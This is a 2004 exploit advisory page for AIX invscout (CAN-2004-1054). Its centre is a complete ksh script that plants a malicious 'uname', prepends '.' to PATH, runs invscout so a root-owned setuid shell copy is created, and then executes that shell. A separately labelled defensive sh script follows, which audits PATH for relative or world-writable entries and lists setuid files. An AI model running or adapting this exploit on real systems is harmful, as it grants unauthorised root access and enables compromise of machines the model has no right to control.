Computer Academic Underground
http://www.caughq.org
Exploit Code

===============/========================================================
Exploit ID:     CAU-EX-2004-0004
Release Date:   2004.12.23
Title:          invscout-suidshell.sh
Description:    invscout exec() Chain Trusted $PATH SUID Shell Creation
Tested:         invscout on AIX 5.1.0
Attributes:     Privileged Access Exploit
URL:            http://www.caughq.org/exploits/CAU-EX-2004-0004.txt
Author/Email:   I)ruid
===============/========================================================

Description
===========

This exploit script writes out a simple shell script named 'uname'
which copies ksh, sets its ownership to root, and sets the setuid bit
on the copy, thus creating a setuid shell. The exploit then executes
'invscout', which in turn executes 'lsvpd' without dropping privileges,
which in turn executes our 'uname' script because it is found first in
a modified $PATH environment variable. Afterward the script cleans up
its mess and executes the setuid shell for convenience.

Notes
=====

This exploit is written assuming your target shell is ksh.

Credits
=======

iDEFENSE Labs is credited with this discovery.

References
==========

http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1054

Exploit
=======

#!/usr/bin/ksh
#
# invscout-suidshell.sh - I)ruid [CAU] (12.2004)
#
# Exploits AIX's invscout tool which does not drop privs
# prior to executing 'lsvpd' which in turn executes 'uname'
# via trusted $PATH environment variable.
#

echo "Creating malicious 'uname'"
cat > ./uname << __EOF__
#!/usr/bin/ksh
cp /usr/bin/ksh ./ksh
chown root:system ./ksh
chmod 6755 ./ksh
__EOF__
chmod 700 ./uname

echo "Setting up malicious PATH environment"
export PATHSAVE=$PATH
export PATH=.:$PATH

# If we don't background this, the user must send
# a ctrl-c to proceed, which kills our script.
echo "Executing /usr/sbin/invscout"
/usr/sbin/invscout &

# Wait for invscout to finish/error
# You may have to adjust this value or execute
# the remainder of this script manually.
sleep 10

echo "Cleaning up our mess..."
rm ./uname
export PATH=$PATHSAVE
export PATHSAVE=

echo "Executing suid shell:"
./ksh
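The root cause above is a privileged program that inherits the caller's $PATH and then runs helpers by bare name. The POSIX sh audit below is an added example written for this page; it is not part of the CAU advisory or its exploit, and the function names, file names and sample PATH values are constructed for it. It flags the PATH entries that make such an exec chain hijackable (empty or relative entries such as '.', and world-writable directories) and lists setuid regular files under a directory, which is how a planted setuid shell copy like the ./ksh above shows up after the fact. The mitigation on the program side is the mirror image: a privileged tool should set PATH to a fixed absolute value and call its helpers by absolute path rather than trusting the environment.

```shell
#!/bin/sh
# path_audit.sh - constructed example, not part of the CAU advisory.
# Flags PATH entries an unprivileged user can control, and lists setuid
# files under a directory tree (the artifact this class of exploit leaves).

# Print one line per unsafe entry: "<reason><TAB><entry>".
# An empty entry (leading/trailing ':' or '::') means the current
# directory, exactly like '.', so it is reported as well.
unsafe_path_entries() {
    [ -n "$1" ] || return 0            # an unset/empty PATH has no entries
    _p="$1:"                           # trailing ':' so the last field is emitted
    while [ -n "$_p" ]; do
        _e=${_p%%:*}
        _p=${_p#*:}
        case "$_e" in
            "")  printf 'empty-entry(cwd)\t<empty>\n' ;;
            /*)
                # Absolute entry: unsafe only if anyone can write into it.
                if [ -d "$_e" ] && [ -n "$(find "$_e" -prune -perm -0002 2>/dev/null)" ]; then
                    printf 'world-writable\t%s\n' "$_e"
                fi ;;
            *)   printf 'relative\t%s\n' "$_e" ;;
        esac
    done
}

# Number of unsafe entries as a bare integer (for scripts and checks).
count_unsafe_path_entries() {
    unsafe_path_entries "$1" | wc -l | tr -d ' '
}

# List regular files with the setuid bit set under a directory tree.
setuid_files_under() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# Demo run when executed directly as path_audit.sh (skipped when sourced).
if [ "${0##*/}" = "path_audit.sh" ]; then
    echo "Auditing current PATH: $PATH"
    unsafe_path_entries "$PATH"
    echo "Unsafe entries: $(count_unsafe_path_entries "$PATH")"
    echo "Setuid files under the current directory:"
    setuid_files_under .
fi
```

Run it as `sh path_audit.sh` to audit the calling shell's PATH, or source it and call `unsafe_path_entries` on the PATH value a privileged program would inherit (for example from `/proc/<pid>/environ` on Linux). A non-zero count from `count_unsafe_path_entries` on the environment of anything that runs setuid or as root is the condition the advisory above depends on.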